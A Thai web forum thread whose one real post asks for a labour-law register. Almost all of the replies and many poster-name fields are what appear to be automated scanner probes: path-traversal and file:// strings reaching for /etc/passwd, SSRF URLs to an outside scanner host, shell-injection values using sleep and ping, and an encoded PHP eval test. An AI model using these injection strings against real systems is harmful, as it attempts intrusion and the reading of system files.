รายละเอียดเว็บบอร์ด

หัวข้อ -> ทะเบียนกฎหมายแรงงาน
 
มีใครมีทะเบียนกฎหมายแรงงานไหมค่ะ หากมีช่วยแชร์หน่อยค่ะ
 
ผู้ตั้ง : สุวิมล วันที่ : 15 ก.พ. 54 12:17:15 น. ผู้ชม : 13,687
 

แสดงความคิดเห็น

ความคิดเห็น : กรอกความคิดเห็นค่ะ
ชื่อผู้ตั้ง : กรอกชื่อผู้ตั้งค่ะ
กรอกรหัสป้องกัน
 

ความคิดเห็น

ความคิดเห็นที่ 250
https://wapiti3.ovh/ssrf/16w6e4/309/746e6f7465/
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:33:12 น.
 
ความคิดเห็นที่ 249
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:33:11 น.
 
ความคิดเห็นที่ 248
Hi there!
 
ผู้ตั้ง : https://wapiti3.ovh/ssrf/16w6e4/309/746e616d65/ วันที่ : 09 ส.ค. 64 13:33:11 น.
 
ความคิดเห็นที่ 247
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:24:04 น.
 
ความคิดเห็นที่ 246
w5h4tcpmzj
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:24:02 น.
 
ความคิดเห็นที่ 245
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:24:02 น.
 
ความคิดเห็นที่ 244
Hi there!
 
ผู้ตั้ง : วันที่ : 09 ส.ค. 64 13:24:01 น.
 
ความคิดเห็นที่ 243
Hi there!
 
ผู้ตั้ง : w31n5lpimi วันที่ : 09 ส.ค. 64 13:23:59 น.
 
ความคิดเห็นที่ 242
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:09:20 น.
 
ความคิดเห็นที่ 241
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:05:04 น.
 
ความคิดเห็นที่ 240
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:05:04 น.
 
ความคิดเห็นที่ 239
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:05:03 น.
 
ความคิดเห็นที่ 238
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:05:03 น.
 
ความคิดเห็นที่ 237
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:05:03 น.
 
ความคิดเห็นที่ 236
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:05:02 น.
 
ความคิดเห็นที่ 235
file://C:WindowsSystem32driversetcservices
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:05:02 น.
 
ความคิดเห็นที่ 234
file:///etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:05:01 น.
 
ความคิดเห็นที่ 233
Hi there!/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:05:01 น.
 
ความคิดเห็นที่ 232
Hi there!/../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:05:01 น.
 
ความคิดเห็นที่ 231
Hi there!/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:05:00 น.
 
ความคิดเห็นที่ 230
Hi there!/../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:05:00 น.
 
ความคิดเห็นที่ 229
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:05:00 น.
 
ความคิดเห็นที่ 228
Hi there!/../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:59 น.
 
ความคิดเห็นที่ 227
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:59 น.
 
ความคิดเห็นที่ 226
Hi there!/../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:59 น.
 
ความคิดเห็นที่ 225
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:59 น.
 
ความคิดเห็นที่ 224
Hi there!/../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:58 น.
 
ความคิดเห็นที่ 223
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:58 น.
 
ความคิดเห็นที่ 222
Hi there!/../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:58 น.
 
ความคิดเห็นที่ 221
Hi there!/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:57 น.
 
ความคิดเห็นที่ 220
Hi there!/../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:57 น.
 
ความคิดเห็นที่ 219
Hi there!/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:56 น.
 
ความคิดเห็นที่ 218
Hi there!/../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:56 น.
 
ความคิดเห็นที่ 217
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:56 น.
 
ความคิดเห็นที่ 216
Hi there!/../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:55 น.
 
ความคิดเห็นที่ 215
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:55 น.
 
ความคิดเห็นที่ 214
Hi there!/../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:55 น.
 
ความคิดเห็นที่ 213
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:54 น.
 
ความคิดเห็นที่ 212
Hi there!/../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:54 น.
 
ความคิดเห็นที่ 211
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:54 น.
 
ความคิดเห็นที่ 210
Hi there!/../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:53 น.
 
ความคิดเห็นที่ 209
../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:53 น.
 
ความคิดเห็นที่ 208
../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:53 น.
 
ความคิดเห็นที่ 207
../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:52 น.
 
ความคิดเห็นที่ 206
../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:52 น.
 
ความคิดเห็นที่ 205
../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:51 น.
 
ความคิดเห็นที่ 204
../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:51 น.
 
ความคิดเห็นที่ 203
../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:51 น.
 
ความคิดเห็นที่ 202
../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:50 น.
 
ความคิดเห็นที่ 201
../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:50 น.
 
ความคิดเห็นที่ 200
../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:50 น.
 
ความคิดเห็นที่ 199
../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:49 น.
 
ความคิดเห็นที่ 198
../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:49 น.
 
ความคิดเห็นที่ 197
../../../../../../../../../../windows/
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:48 น.
 
ความคิดเห็นที่ 196
../../../../../../../../../../lib/
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:48 น.
 
ความคิดเห็นที่ 195
C:/Windows/System32/drivers/etc/services::$DATA
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:48 น.
 
ความคิดเห็นที่ 194
C:/Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:48 น.
 
ความคิดเห็นที่ 193
C:/Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:47 น.
 
ความคิดเห็นที่ 192
C:WindowsSystem32driversetcservices::$DATA
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:47 น.
 
ความคิดเห็นที่ 191
C:WindowsSystem32driversetcservices
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:47 น.
 
ความคิดเห็นที่ 190
C:WindowsSystem32driversetcservices
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:46 น.
 
ความคิดเห็นที่ 189
/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:46 น.
 
ความคิดเห็นที่ 188
/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:46 น.
 
ความคิดเห็นที่ 187
/etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:45 น.
 
ความคิดเห็นที่ 186
/etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:45 น.
 
ความคิดเห็นที่ 185
https://wapiti3.ovh/e.php
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:45 น.
 
ความคิดเห็นที่ 184
https://wapiti3.ovh/e.php
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:44 น.
 
ความคิดเห็นที่ 183
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:44 น.
 
ความคิดเห็นที่ 182
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:44 น.
 
ความคิดเห็นที่ 181
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:43 น.
 
ความคิดเห็นที่ 180
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:43 น.
 
ความคิดเห็นที่ 179
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:42 น.
 
ความคิดเห็นที่ 178
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:42 น.
 
ความคิดเห็นที่ 177
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:42 น.
 
ความคิดเห็นที่ 176
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:41 น.
 
ความคิดเห็นที่ 175
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:41 น.
 
ความคิดเห็นที่ 174
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:41 น.
 
ความคิดเห็นที่ 173
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:40 น.
 
ความคิดเห็นที่ 172
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:40 น.
 
ความคิดเห็นที่ 171
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:40 น.
 
ความคิดเห็นที่ 170
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:39 น.
 
ความคิดเห็นที่ 169
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:39 น.
 
ความคิดเห็นที่ 168
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:39 น.
 
ความคิดเห็นที่ 167
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:39 น.
 
ความคิดเห็นที่ 166
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:38 น.
 
ความคิดเห็นที่ 165
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:38 น.
 
ความคิดเห็นที่ 164
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:38 น.
 
ความคิดเห็นที่ 163
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:37 น.
 
ความคิดเห็นที่ 162
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:37 น.
 
ความคิดเห็นที่ 161
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:37 น.
 
ความคิดเห็นที่ 160
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:37 น.
 
ความคิดเห็นที่ 159
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:36 น.
 
ความคิดเห็นที่ 158
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:36 น.
 
ความคิดเห็นที่ 157
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:36 น.
 
ความคิดเห็นที่ 156
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:35 น.
 
ความคิดเห็นที่ 155
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:35 น.
 
ความคิดเห็นที่ 154
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:35 น.
 
ความคิดเห็นที่ 153
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:34 น.
 
ความคิดเห็นที่ 152
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:34 น.
 
ความคิดเห็นที่ 151
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:33 น.
 
ความคิดเห็นที่ 150
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:33 น.
 
ความคิดเห็นที่ 149
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:32 น.
 
ความคิดเห็นที่ 148
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:32 น.
 
ความคิดเห็นที่ 147
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:32 น.
 
ความคิดเห็นที่ 146
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:31 น.
 
ความคิดเห็นที่ 145
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:31 น.
 
ความคิดเห็นที่ 144
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:31 น.
 
ความคิดเห็นที่ 143
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:30 น.
 
ความคิดเห็นที่ 142
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:30 น.
 
ความคิดเห็นที่ 141
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:30 น.
 
ความคิดเห็นที่ 140
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:29 น.
 
ความคิดเห็นที่ 139
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:29 น.
 
ความคิดเห็นที่ 138
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:29 น.
 
ความคิดเห็นที่ 137
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:29 น.
 
ความคิดเห็นที่ 136
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:28 น.
 
ความคิดเห็นที่ 135
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:28 น.
 
ความคิดเห็นที่ 134
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:27 น.
 
ความคิดเห็นที่ 133
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:27 น.
 
ความคิดเห็นที่ 132
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:26 น.
 
ความคิดเห็นที่ 131
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:26 น.
 
ความคิดเห็นที่ 130
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:26 น.
 
ความคิดเห็นที่ 129
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:25 น.
 
ความคิดเห็นที่ 128
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:25 น.
 
ความคิดเห็นที่ 127
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:25 น.
 
ความคิดเห็นที่ 126
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:04:24 น.
 
ความคิดเห็นที่ 125
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 11:04:24 น.
 
ความคิดเห็นที่ 124
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 11:04:23 น.
 
ความคิดเห็นที่ 123
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 11:04:23 น.
 
ความคิดเห็นที่ 122
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 11:04:22 น.
 
ความคิดเห็นที่ 121
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 11:04:22 น.
 
ความคิดเห็นที่ 120
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 11:04:22 น.
 
ความคิดเห็นที่ 119
Hi there!
 
ผู้ตั้ง : file://C:WindowsSystem32driversetcservices วันที่ : 09 ส.ค. 64 11:04:21 น.
 
ความคิดเห็นที่ 118
Hi there!
 
ผู้ตั้ง : file:///etc/passwd วันที่ : 09 ส.ค. 64 11:04:21 น.
 
ความคิดเห็นที่ 117
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/ser วันที่ : 09 ส.ค. 64 11:04:21 น.
 
ความคิดเห็นที่ 116
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:04:20 น.
 
ความคิดเห็นที่ 115
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/ser วันที่ : 09 ส.ค. 64 11:04:20 น.
 
ความคิดเห็นที่ 114
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:04:20 น.
 
ความคิดเห็นที่ 113
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:04:20 น.
 
ความคิดเห็นที่ 112
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:04:19 น.
 
ความคิดเห็นที่ 111
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:04:19 น.
 
ความคิดเห็นที่ 110
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:04:19 น.
 
ความคิดเห็นที่ 109
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:04:18 น.
 
ความคิดเห็นที่ 108
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:04:18 น.
 
ความคิดเห็นที่ 107
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:04:18 น.
 
ความคิดเห็นที่ 106
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:04:18 น.
 
ความคิดเห็นที่ 105
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/ser วันที่ : 09 ส.ค. 64 11:04:17 น.
 
ความคิดเห็นที่ 104
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:04:17 น.
 
ความคิดเห็นที่ 103
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/ser วันที่ : 09 ส.ค. 64 11:04:17 น.
 
ความคิดเห็นที่ 102
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:04:16 น.
 
ความคิดเห็นที่ 101
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:04:16 น.
 
ความคิดเห็นที่ 100
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:04:15 น.
 
ความคิดเห็นที่ 99
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:04:15 น.
 
ความคิดเห็นที่ 98
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:04:15 น.
 
ความคิดเห็นที่ 97
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:04:15 น.
 
ความคิดเห็นที่ 96
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:04:14 น.
 
ความคิดเห็นที่ 95
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:04:14 น.
 
ความคิดเห็นที่ 94
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:04:14 น.
 
ความคิดเห็นที่ 93
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:04:13 น.
 
ความคิดเห็นที่ 92
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:04:13 น.
 
ความคิดเห็นที่ 91
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:04:13 น.
 
ความคิดเห็นที่ 90
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:04:12 น.
 
ความคิดเห็นที่ 89
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:04:12 น.
 
ความคิดเห็นที่ 88
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:04:11 น.
 
ความคิดเห็นที่ 87
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:04:11 น.
 
ความคิดเห็นที่ 86
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:04:11 น.
 
ความคิดเห็นที่ 85
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:04:10 น.
 
ความคิดเห็นที่ 84
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:04:10 น.
 
ความคิดเห็นที่ 83
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:04:10 น.
 
ความคิดเห็นที่ 82
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:04:10 น.
 
ความคิดเห็นที่ 81
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../windows/ วันที่ : 09 ส.ค. 64 11:04:09 น.
 
ความคิดเห็นที่ 80
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../lib/ วันที่ : 09 ส.ค. 64 11:04:09 น.
 
ความคิดเห็นที่ 79
Hi there!
 
ผู้ตั้ง : C:/Windows/System32/drivers/etc/services::$DATA วันที่ : 09 ส.ค. 64 11:04:08 น.
 
ความคิดเห็นที่ 78
Hi there!
 
ผู้ตั้ง : C:/Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:04:08 น.
 
ความคิดเห็นที่ 77
Hi there!
 
ผู้ตั้ง : C:/Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:04:08 น.
 
ความคิดเห็นที่ 76
Hi there!
 
ผู้ตั้ง : C:WindowsSystem32driversetcservices::$DATA วันที่ : 09 ส.ค. 64 11:04:07 น.
 
ความคิดเห็นที่ 75
Hi there!
 
ผู้ตั้ง : C:WindowsSystem32driversetcservices วันที่ : 09 ส.ค. 64 11:04:07 น.
 
ความคิดเห็นที่ 74
Hi there!
 
ผู้ตั้ง : C:WindowsSystem32driversetcservices วันที่ : 09 ส.ค. 64 11:04:07 น.
 
ความคิดเห็นที่ 73
Hi there!
 
ผู้ตั้ง : /etc/services วันที่ : 09 ส.ค. 64 11:04:07 น.
 
ความคิดเห็นที่ 72
Hi there!
 
ผู้ตั้ง : /etc/services วันที่ : 09 ส.ค. 64 11:04:06 น.
 
ความคิดเห็นที่ 71
Hi there!
 
ผู้ตั้ง : /etc/passwd วันที่ : 09 ส.ค. 64 11:04:06 น.
 
ความคิดเห็นที่ 70
Hi there!
 
ผู้ตั้ง : /etc/passwd วันที่ : 09 ส.ค. 64 11:04:06 น.
 
ความคิดเห็นที่ 69
Hi there!
 
ผู้ตั้ง : https://wapiti3.ovh/e.php วันที่ : 09 ส.ค. 64 11:04:06 น.
 
ความคิดเห็นที่ 68
Hi there!
 
ผู้ตั้ง : https://wapiti3.ovh/e.php วันที่ : 09 ส.ค. 64 11:04:05 น.
 
ความคิดเห็นที่ 67
&ping -n 25 127.0.0.1&
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:45 น.
 
ความคิดเห็นที่ 66
a|sleep 60;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:44 น.
 
ความคิดเห็นที่ 65
a;sleep 60;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:44 น.
 
ความคิดเห็นที่ 64
a`sleep 60`
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:44 น.
 
ความคิดเห็นที่ 63
a`)`
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:43 น.
 
ความคิดเห็นที่ 62
data:;base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg==
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:43 น.
 
ความคิดเห็นที่ 61
/e
 
